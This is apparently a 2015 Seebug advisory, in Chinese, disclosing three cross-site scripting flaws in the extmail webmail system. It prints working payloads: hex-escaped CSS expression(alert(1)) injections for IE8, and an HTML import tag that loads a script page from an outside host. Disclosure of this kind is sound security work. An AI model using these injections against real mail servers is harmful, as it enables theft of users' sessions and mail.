extmail邮件系统几个XSS跨站漏洞

2015-07-08T00:00:00
ID SSV:96136
Type seebug
Reporter Root
Modified 2015-07-08T00:00:00

Description

简要描述:

extmail邮件系统是一款国内开发的开源的邮件系统,主要应用于企业、学校、政府等方面,在国内拥有较大的客户群体,该邮件系统存在xss漏洞

详细说明:

extmail邮件系统是一款国内开发的开源的邮件系统,主要应用于企业、学校、政府等方面,在国内拥有较大的客户群体,该邮件系统存在xss漏洞

测试官方登录地址:http://.../extmail/cgi/index.cgi 测试帐号:demo 密码:demo 漏洞一: 测试代码如下:<div style=xss:\65\78\70\72\65\73\73\69\6f\6e\28\61\6c\65\72\74\28\31\29\29></div> 反斜杠是单的哦 测试环境:win7+ie8 效果图

<img src="https://images.seebug.org/upload/201506/16135539e27cfaa8ee1a04760711afee2e8a15b7.png" alt="ie11111QQ图片20150616135426.png" width="600" onerror="javascript:errimg(this);">

漏洞二: 测试代码如下:<img style=xss:\65\78\70\72\65\73\73\69\6f\6e\28\61\6c\65\72\74\28\31\29\29></div> 测试环境:win7+ie8 效果图

<img src="https://images.seebug.org/upload/201506/16140009e526152390ce687a0badc88462bb09d4.png" alt="ie22222QQ图片20150616135612.png" width="600" onerror="javascript:errimg(this);">

漏洞三: 测试代码如下:<link rel=import href=http://mhz.pw/game/SOP/01.php>
测试环境:各版本Google浏览器。

效果图

<img src="https://images.seebug.org/upload/201506/161402127dd75a2ebdefd4aca7867fe1444ab456.png" alt="ie33333QQ图片20150616140101.png" width="600" onerror="javascript:errimg(this);">

漏洞证明:

extmail邮件系统是一款国内开发的开源的邮件系统,主要应用于企业、学校、政府等方面,在国内拥有较大的客户群体,该邮件系统存在xss漏洞 测试官方登录地址:http://.../extmail/cgi/index.cgi 测试帐号:demo 密码:demo 漏洞一: 测试代码如下:<div style=xss:\65\78\70\72\65\73\73\69\6f\6e\28\61\6c\65\72\74\28\31\29\29></div> 测试环境:win7+ie8 效果图

<img src="https://images.seebug.org/upload/201506/16135539e27cfaa8ee1a04760711afee2e8a15b7.png" alt="ie11111QQ图片20150616135426.png" width="600" onerror="javascript:errimg(this);">

漏洞二: 测试代码如下:<img style=xss:\65\78\70\72\65\73\73\69\6f\6e\28\61\6c\65\72\74\28\31\29\29></div> 测试环境:win7+ie8 效果图

<img src="https://images.seebug.org/upload/201506/16140009e526152390ce687a0badc88462bb09d4.png" alt="ie22222QQ图片20150616135612.png" width="600" onerror="javascript:errimg(this);">

漏洞三: 测试代码如下:<link rel=import href=http://mhz.pw/game/SOP/01.php>
测试环境:各版本Google浏览器。

效果图

<img src="https://images.seebug.org/upload/201506/161402127dd75a2ebdefd4aca7867fe1444ab456.png" alt="ie33333QQ图片20150616140101.png" width="600" onerror="javascript:errimg(this);">